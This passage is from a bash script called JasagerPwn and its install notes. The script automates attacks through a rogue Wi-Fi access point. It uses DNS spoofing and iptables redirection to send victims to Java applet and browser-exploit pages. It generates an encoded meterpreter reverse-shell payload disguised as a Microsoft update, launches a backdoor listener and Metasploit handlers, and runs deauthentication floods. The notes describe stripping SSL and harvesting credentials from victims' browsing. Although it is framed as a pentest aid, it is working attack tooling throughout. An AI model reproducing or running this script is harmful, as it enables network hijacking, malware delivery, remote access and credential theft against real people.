  1022.                 elif [ $fakeupdate -eq 1 ]; then
  1023.                    echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict."
  1024.                 elif [ $javaATK -eq 0 ]; then
  1025.                   echo -n -e "\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required:  "
  1026.                   read -e JavaSite
  1027.                   case $JavaSite in
  1028.                    G|g|Google|google|1)
  1029.                    if [ $autoMetScript -eq 1 ]; then metScript; fi
  1030.                    javasite="1"
  1031.                    JavaSite
  1032.                    xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
  1033.                    xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google  && /etc/init.d/apache2 reload"
  1034.                    xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-google2" &
  1035.                    ;;
  1036.                    J|j|Java|java|2)
  1037.                    if [ $autoMetScript -eq 1 ]; then metScript; fi
  1038.                    javasite="2" && sleep 1
  1039.                    JavaSite
  1040.                    xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
  1041.                    xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn  && /etc/init.d/apache2 reload"
  1042.                    xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-java2" &
  1043.                    ;;
  1044.                    *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1045.                   esac
  1046.                    echo -n -e "\e[01;34m[*]\e[00m Press [ENTER] when SET is ready.."
  1047.                    read -e $blahblahblah
  1048.                    ipTableRedirect
  1049.                    if [ $autoMetScript -eq 1 ]; then metScript; fi
  1050.                    echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
  1051.                 #iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP
  1052.                 #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
  1053.                 #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
  1054.                 #iptables --table nat --append PREROUTING --in-interface $FONIFACE
  1055.                 #Check for bad index.html.. whys it index2.html? lolwtf
  1056.                 if [ -e "$SETpath/src/web_clone/site/template/index2.html" ] && [ ! -e "$SETpath/src/web_clone/site/template/index.html" ]; then
  1057.                 mv "$SETpath/src/web_clone/site/template/index2.html" "$SETpath/src/web_clone/site/template/index.html"
  1058.                 fi
  1059.                 if [ -e "/var/www/javapwn/index2.html" ] && [ ! -e "/var/www/javapwn/index.html" ]; then
  1060.                 mv "/var/www/javapwn/index2.html" "/var/www/javapwn/index.html"
  1061.                 fi
  1062.                 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
  1063.                 sleep 2
  1064.                 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
  1065.                 javaATK="1"
  1066.                 fi
  1067.                 while true
  1068.                 do
  1069.                         if [ $browserpwn -eq 1 ]; then break; fi
  1070.                         if [ $fakeupdate -eq 1 ]; then break; fi
  1071.                         #echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu:  "
  1072.                         #read -e $CONFIRM7
  1073.                         echo
  1074.                         echo -e "\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m"
  1075.                         echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
  1076.                         read -e USR_CHOICE9
  1077.                         #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE9
  1078.                         case $USR_CHOICE9 in
  1079.                                 S|s|Stop|stop|1)
  1080.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
  1081.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
  1082.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
  1083.                                         IPTABLES
  1084.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
  1085.                                         xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &
  1086.                                         javaATK="0"
  1087.                                         sleep 3
  1088.                                         #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
  1089.                                         if [ $wasSniffing != "0" ]; then
  1090.                                                 sslstrip
  1091.                                         fi
  1092.                                         echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!"
  1093.                                         break
  1094.                                 ;;
  1095.                                 M|m|Menu|menu|2)
  1096.                                 break
  1097.                                 ;;
  1098.                                 *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1099.                         esac
  1100.                 done
  1101.                 ;;
  1102.                 F|f|fakeupdate|Fakeupdate|2)
  1103.                 if [ $browserpwn -eq 1 ]; then
  1104.                   echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict."
  1105.                 elif [ $javaATK -eq 1 ]; then
  1106.                   echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
  1107.                 elif [ $fakeupdate -eq 0 ]; then
  1108.                   if [ $autoMetScript -eq 1 ]; then metScript; fi
  1109.                   echo -e "\e[01;33m[!]\e[00m Creating Exploit (Windows)..."
  1110.                   xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Windows)" -e "msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP R | msfencode -x $Fwww/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/Windows-KB183905-x86-ENU.exe"
  1111.                   echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
  1112.                   ipTableRedirect
  1113.                   #iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP
  1114.                   #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
  1115.                   #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
  1116.                   #iptables --table nat --append PREROUTING --in-interface $FONIFACE
  1117.                   #xterm -geometry 110x42+464-38 -bg black -fg green -T "[MFU Handler] v$version - Metasploit" -e "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourIP E" &
  1118.                   xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version - Metasploit" -e "msfconsole -r /tmp/msfrc" &
  1119.                   echo -e "\e[01;33m[!]\e[00m Getting the backdoor (SBD) ready..."
  1120.                   xterm -geometry 75x22+10+450 -bg black -fg green -T "[JasagerPwn-SBD] v$version - SBD" -e "sbd -l -k leg3nd -p $port" &
  1121.                   xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
  1122.                   sleep 3
  1123.                   xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
  1124.                   fakeupdate="1"
  1125.                   echo -e "\e[01;32m[>]\e[00m Starting Web Server @ $ourIP:80..."
  1126.                   xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
  1127.                   xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload"
  1128.                 fi
  1129.                 while true
  1130.                 do
  1131.                         if [ $browserpwn -eq 1 ]; then break; fi
  1132.                         if [ $javaATK -eq 1 ]; then break; fi
  1133.                         #echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu:  "
  1134.                         #read -e $CONFIRM7
  1135.                         echo
  1136.                         echo -e "\e[01;33m[MODE][==========-FakeUpdate Metasploit-==========][!]\e[00m"
  1137.                         #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE1
  1138.                         echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
  1139.                         read -e USR_CHOICE1
  1140.                         case $USR_CHOICE1 in
  1141.                                 S|s|Stop|stop|1)
  1142.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
  1143.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
  1144.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
  1145.                                         IPTABLES
  1146.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version" -e "killall -9 dnsspoof" &
  1147.                                         xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version" -e "/etc/init.d/apache2 stop" &
  1148.                                         fakeupdate="0"
  1149.                                         sleep 3
  1150.                                         #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
  1151.                                         if [ $wasSniffing != "0" ]; then
  1152.                                                 sslstrip
  1153.                                         fi
  1154.                                         echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!"
  1155.                                         break
  1156.                                 ;;
  1157.                                 M|m|Menu|menu|2)
  1158.                                 break
  1159.                                 ;;
  1160.                                 *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1161.                         esac   
  1162.                 done
  1163.                 ;;
  1164.                 B|b|browserpwn|browserPwn|3)
  1165.                 if [ $fakeupdate -eq 1 ]; then
  1166.                                 echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port conflict."
  1167.                 elif [ $javaATK -eq 1 ]; then
  1168.                                 echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
  1169.                 elif [ $browserpwn -eq 0 ]; then
  1170.                 if [ $autoMetScript -eq 1 ]; then metScript; fi
  1171.                 xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
  1172.                 xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &
  1173.                 xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version" -e "msfconsole -r /tmp/msfrcBP" &
  1174.                 #xterm -geometry 110x42+464-38 -bg black -fg green -T "[leg3nd-BrowserPwn] v$version - WebServer" -e "msfcli auxiliary/server/browser_autopwn LHOST=$ourIP SRVPORT=80 SRVHOST=$ourIP URIPATH=/ E" &
  1175.                 sleep 25
  1176.                 echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
  1177.                 ipTableRedirect
  1178.                 #iptables -t nat -A PREROUTING -p udp -j DNAT --to $ourIP
  1179.                 #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
  1180.                 #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
  1181.                 #iptables --table nat --append PREROUTING --in-interface $FONIFACE
  1182.  
  1183.                 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" &
  1184.                 echo -e "\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $ourIP:80..."
  1185.                 browserpwn="1"
  1186.              fi
  1187.                 while true
  1188.                 do
  1189.                         if [ $fakeupdate -eq 1 ]; then break; fi
  1190.                         if [ $javaATK -eq 1 ]; then break; fi
  1191.                         echo
  1192.                         echo -e "\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m"
  1193.                         echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: "
  1194.                         read -e USR_CHOICE2
  1195.                         #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE2
  1196.                         case $USR_CHOICE2 in
  1197.                                 S|s|Stop|stop|1)
  1198.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" &
  1199.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" &
  1200.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" &
  1201.                                         IPTABLES
  1202.                                         xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
  1203.                                         xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" &       
  1204.                                         browserpwn="0"
  1205.                                         sleep 3
  1206.                                         #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
  1207.                                         if [ $wasSniffing != "0" ]; then
  1208.                                                 sslstrip
  1209.                                         fi
  1210.                                         echo -e "\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!"
  1211.                                         echo -e "\e[01;33m[!]\e[00m Dont Forget To Run 'ipconfig /flushdns' On Victim!!"
  1212.                                         break
  1213.                                 ;;
  1214.                                 M|m|Menu|menu|2)
  1215.                                 echo -e "\e[01;33m[!]\e[00m Please kill Browser AutoPwn jobs in metasploit, or close it."
  1216.                                 break
  1217.                                 ;;
  1218.                                 *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1219.                         esac   
  1220.                 done
  1221.                 ;;
  1222.                 D|d|deauth|Deauth|DeAuth|5)
  1223.                 attackCheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
  1224.                         while true
  1225.                         do
  1226.                                 echo
  1227.                                 echo -e "\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m"
  1228.                                 echo -e "\e[01;33m[!]\e[00m [1][A]irodrop-ng  [2][D]eAuth Mass  [3][S]ingle DeAuth"
  1229.                                 echo -e "\e[01;33m[!]\e[00m [4][K]ill         [5][M]ain menu"
  1230.                                 #read -r -p "[?] Please enter [ A | D | S | K | M ]:  "  USR_CHOICE3
  1231.                                 echo -e -n "\e[01;33m[!]\e[00m Choose From Above: "
  1232.                                 read -e USR_CHOICE3
  1233.                                 case $USR_CHOICE3 in
  1234.                                         A|a|airodrop|Airodrop|1)
  1235.                                            if [ -e "/usr/bin/airdrop-ng" ]; then
  1236.                                                 if [ -e "/tmp/cap-01.csv" ]; then rm /tmp/cap-* ; fi
  1237.                                                 sleep 2
  1238.                                                 xterm -geometry 90x30+464+0 -bg black -fg green -T "[JasagerPwn-Airodump] Capturing APs" -e "airodump-ng -w /tmp/cap -o csv $MIFACE" &
  1239.                                                 AIRDUMPID=`echo $!`
  1240.                                                 sleep 10
  1241.                                                 xterm -geometry 75x12+464+418 -bg black -fg green -hold -T "[JasagerPwn-Airdrop Attack] v$version" -e "airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv" &
  1242.                                                 AIRDROPID=`echo $!`
  1243.                                             else
  1244.                                                 echo
  1245.                                                 echo -e "\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this."
  1246.                                                 echo -e "\e[01;31m[!]\e[00m Please go to /pentest/wireless/airdrop-ng and run install.py."
  1247.                                             fi
  1248.                                         ;;
  1249.                                         D|d|deauth|DeAuth|2)
  1250.                                         #if [ ! $ATKcheck ]; then
  1251.                                         #       xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE" &
  1252.                                         #       sleep 4
  1253.                                         #fi
  1254.                                                 xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-MassDeauth.sh] v$version" -e "chmod +x src/deauth.sh && bash src/deauth.sh" &
  1255.                                         DEAUTHPID=`echo $!`
  1256.                                         ;;
  1257.                                         S|s|single|Single|3)
  1258.                                         #if [ ! $ATKcheck ]; then
  1259.                                         #       xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "#airmon-ng start $WIFACE" &
  1260.                                         #       sleep 4
  1261.                                         #fi
  1262.                                                 xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "killall -9 aireplay" &
  1263.                                                 xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng $MIFACE" &
  1264.                                                 airID=`echo $!`
  1265.                                                 echo
  1266.                                                 read -r -p "[?] Enter the target APs BSSID: "   TBSSID
  1267.                                                 kill $airID
  1268.                                                 read -r -p "[?] Do You want a specific client? [ Y | N ]: "  DMODE
  1269.                                         case $DMODE in
  1270.                                                 y|Y|Yes|yes|1)
  1271.                                                 xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng --bssid $TBSSID $MIFACE" &
  1272.                                                 echo
  1273.                                                 read -r -p "[?] Enter the target Client MAC: " CMAC
  1274.                                                 xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE" &
  1275.                                         ;;
  1276.                                         n|N|No|no|2)
  1277.                                                 xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -0 20 -D -a $TBSSID $MIFACE" &
  1278.                                         ;;
  1279.                                         *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1280.                                         esac
  1281.                                         #take in information from dump for aireplay
  1282.  
  1283.                                         ;;
  1284.                                         K|k|kill|Kill|4)
  1285.                                         xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID" &
  1286.                                         xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID" &
  1287.                                         ;;
  1288.                                         M|m|menu|Menu|5)
  1289.                                         break
  1290.                                         ;;
  1291.                                         *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1292.                                 esac
  1293.                         done
  1294.                 ;;
  1295.                 N|n|Network|network|net|6)
  1296.                         while true
  1297.                         do
  1298.                                 echo
  1299.                                 echo -e "\e[01;33m[MODE][==================-Network Settings-====================][!]\e[00m"
  1300.                                 echo -e "\e[01;33m[!]\e[00m [1][I]nterface       [2][D]eAuth Config"
  1301.                                 echo -e "\e[01;33m[!]\e[00m [3][R]efresh I-net   [4][M]ain menu"
  1302.                                 echo -e -n "\e[01;33m[!]\e[00m Choose From Above: "
  1303.                                 read -e USR_CHOICE99
  1304.                                 case $USR_CHOICE99 in
  1305.                                         I|i|interface|Interface|1)
  1306.                                         read -r -p "[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: "  USR_CHOICE98
  1307.                                         case $USR_CHOICE98 in
  1308.                                         #Connecting to WIFI
  1309.                                         y|Y|Yes|yes|1)
  1310.                                         xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh"
  1311.                                         #kill $dnsID2 >/dev/null 2>&1
  1312.                                             echo
  1313.                                             read -p "[!] Connect to WiFi Network THEN Press [Enter] .."
  1314.                                             echo
  1315.                                             echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE"
  1316.                                             read -r -p "[?] Please Enter the New Gateway Interface: "   NEWIFACE  
  1317.                                             IFACE=`echo $NEWIFACE`
  1318.                                                   if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
  1319.                                                   IPTABLES
  1320.                                                   elif [ $sniffing -eq 1 ]; then
  1321.                                                   ipTableRedirect
  1322.                                                   elif [ $browserpwn -eq 1 ]; then
  1323.                                                   ipTableRedirect
  1324.                                                   elif [ $fakeupdate -eq 1 ]; then
  1325.                                                   ipTableRedirect
  1326.                                                   elif [ $javaATK -eq 1 ]; then
  1327.                                                   ipTableRedirect
  1328.                                                   fi
  1329.                                             while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 &
  1330.                                             sleep 2 && dnsID2=`echo $!`
  1331.                                             wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`
  1332.                                             newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'`
  1333.                                             echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf
  1334.                                         ;;
  1335.                                         #Connecting to HARDWIRE
  1336.                                         n|N|No|no|2)
  1337.                                            #kill $dnsID2 >/dev/null 2>&1
  1338.                                            xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh"
  1339.                                             echo
  1340.                                             echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE"
  1341.                                             read -r -p "[?] Please Enter the New Gateway Interface: "   NEWIFACE  
  1342.                                             IFACE=`echo $NEWIFACE`
  1343.                                                   if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
  1344.                                                   IPTABLES
  1345.                                                   elif [ $sniffing -eq 1 ]; then
  1346.                                                   ipTableRedirect
  1347.                                                   elif [ $browserpwn -eq 1 ]; then
  1348.                                                   ipTableRedirect
  1349.                                                   elif [ $fakeupdate -eq 1 ]; then
  1350.                                                   ipTableRedirect
  1351.                                                   elif [ $javaATK -eq 1 ]; then
  1352.                                                   ipTableRedirect
  1353.                                                   fi
  1354.                                             #while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 &
  1355.                                             echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
  1356.                                             chmod +x /tmp/resolv.sh
  1357.                                             xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
  1358.                                             sleep 2 && dnsID2=`echo $!`
  1359.                                         ;;
  1360.                                         *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1361.                                         esac
  1362.                
  1363.                                         ;;
  1364.                                         D|d|deauth|DeAuth|2)
  1365.                                         xterm -geometry 95x47+577+0 -bg black -fg green -T "[EDITING] Airdrop DeAuth Config" -e "nano /tmp/deauth.conf"
  1366.                                         echo
  1367.                                         echo -e "\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes."
  1368.                                         ;;
  1369.                                         R|r|refresh|Refresh|3)
  1370.                                         xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "ifconfig $IFACE up && dhclient $IFACE"
  1371.                                         sleep 3
  1372.                                         gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
  1373.                                         xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" &
  1374.                                         #while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &> /dev/null &
  1375.                                         echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
  1376.                                         chmod +x /tmp/resolv.sh
  1377.                                         xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
  1378.                                         sleep 2 && dnsID2=`echo $!`
  1379.                                         ;;
  1380.                                         M|m|menu|Menu|4)
  1381.                                         break
  1382.                                         ;;
  1383.                                         *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1384.                                 esac
  1385.                         done
  1386.                 ;;
  1387.                 X|x|exit|Exit|7)
  1388.                 cleanup
  1389.                 ;;
  1390.                 *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
  1391.         esac
  1392. done
  1393.  
  1394. cleanup
  1395.  
  1396. #######################################################################################
  1397.  
  1398. INSTALL_HOWTO:
  1399.  
  1400. ================================
  1401. JasagerPwn Attack Vector Script
  1402. --------------------------------
  1403. leg3nd @ info-s3curity.com
  1404. --------------------------------
  1405. Bugs @ hak5 forums or via email
  1406. dgriffin831@gmail.com
  1407. --------------------------------
  1408. ================================
  1409. General Description: This is a fairly basic bash script used to automate multiple attack vectors
  1410. using Jasager/Karma on a Fon router. The script is designed to be error coded and seamless in terms
  1411. of switching access and attacks at will. I have found it to be extremely useful in pentest scenarios
  1412. becuase of all the time saved doing basic setup for attacks manually. Enjoy at your own risk!
  1413.  
  1414.  
  1415. -This script is going to assume your using backtrack 4 with /pentest/, if you
  1416. have it somewhere else just adjust it accordingly.
  1417.  
  1418.  The following dependencies are required for full functionality of the script...
  1419.  Dependencies: PHP5, Apache2, Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite,
  1420.               DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection.
  1421.  
  1422. Step 1: Insure you have everything needed.
  1423. ------------------------------------------
  1424.   apt-get install php5 dhcp3-server macchanger dsniff aircrack-ng apache2 twisted-web libapache2-mod-php5
  1425.   cd /pentest/exploits/SET/ && python install.py
  1426.   cd /pentest/wireless/airdrop-ng/ && python install.py
  1427.  
  1428.   - Make sure SSLstrip is installed with the same method, I think it is by default in bt4.
  1429.     If it isnt working this is how to install it:
  1430.         cd /pentest/
  1431.         wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
  1432.         tar xvf sslstrip-0.7.tar.gz
  1433.         cd sslstrip-0.7/
  1434.         chmod +x setup.py
  1435.         python setup.py
  1436.  
  1437. Step 2: Adjust the script variables.
  1438. ------------------------------------
  1439.   - Open up the script in your favorite editor and look over all the variables and their comments.
  1440.   - If your not using bt4 you may need to adjust the SET and MSF diretories.
  1441.   - Set up the correct interfaces according to your setup.
  1442.   - Set the 'fonIP' variable to an available IP on the FONs subnet.
  1443.   - I recommend setting up the 'metScript' function to automaticlly do what you need on your victims, by
  1444.   default this set to "0" and uses reverse_tcp_dns backdoors.
  1445.  
  1446. Step 3: Setup FON
  1447. ------------------
  1448.   - We need to remove DHCP on the fon becuase we will be running it from the computer instead.
  1449.   - If your using some other DHCP service you may also need to disable that.
  1450.  
  1451.   /etc/init.d/dnsmasq stop
  1452.   /etc/init.d/dnsmasq disable
  1453.  
  1454. Thats it! If everything is done correctly and assuming the system has the correct versions of python and ruby,
  1455. you should be good to go.
  1456.  
  1457. =======================
  1458. Included Attacks
  1459. =======================
  1460.  
  1461. SSLstrip/Sniffing: By default it will always be using dsniff, driftnet, and urlsnarf becuase its seemless to the users anyways.
  1462.                    The attack SSLstrip/sniffing will start stealing SSL certs from https:// websites as they browse, it works on
  1463.                    around 95% of SSL websites, These logs will be followed, saved, and parsed for login credentials. SSLstrip is
  1464.                    set to use port 10000 and will be paused when using other attacks.
  1465.  
  1466. FakeUpdate(by g0tmi1k): Redirect WLAN to fake microsoft update page hosted in apache with a generated payload with meterpreter
  1467.                         reverse_tcp. This currently only has download support for MS clients.
  1468.  
  1469. BrowserPwn: This will redirect WLAN to a metasploit browser_autopwn server, This is fairly nosiy and will throw out any exploit
